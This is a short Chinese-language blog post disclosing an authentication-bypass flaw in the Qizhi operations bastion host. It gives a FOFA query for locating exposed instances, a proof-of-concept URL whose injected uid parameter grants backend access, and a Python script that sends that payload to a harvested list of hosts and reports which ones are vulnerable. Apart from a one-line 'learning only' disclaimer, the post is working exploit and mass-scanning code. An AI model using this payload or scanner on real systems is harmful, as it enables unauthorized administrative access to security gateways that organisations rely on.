赞
踩
声明:仅供漏洞检测和学习,勿用于非法测试
漏洞信息
浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司,近日,HW期间情报齐治运维堡垒机服务端存在任意用户登录系统漏洞,访问特定的Url即可获得后台权限。漏洞情报泄露时间:2021-04-10 23:03:05
fofa查询语法
app=“齐治科技-堡垒机”
POC
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
批量检测脚本
可以先用fofa批量获取ip -》批量爬取fofa查询的目标ip地址
- from requests.packages import urllib3
- urllib3.disable_warnings()
- import requests
- from colorama import init
- init(autoreset=True)
- headers = {
- 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280',
- }
-
- for url in open("./app=齐治科技-堡垒机.txt",'r'):
- #读取出来的数据默认加了换行符,这里要去掉
- url = url.strip("\n")
- vu_url = url + "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
- try:
- re = requests.get(url=vu_url,headers=headers,verify=False,timeout=10,proxies={'https':'127.0.0.1:7890'})
- if "您尚未登录或者您的会话已超时,请 重新登录系统" in re.text:
- print(f"{url}漏洞不存在")
- elif "错误的id" in re.text:
- print(f"\033[0;32m{vu_url}漏洞存在\033[0m")
- except:
- print(f"{url}无响应")
- print('ok')
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。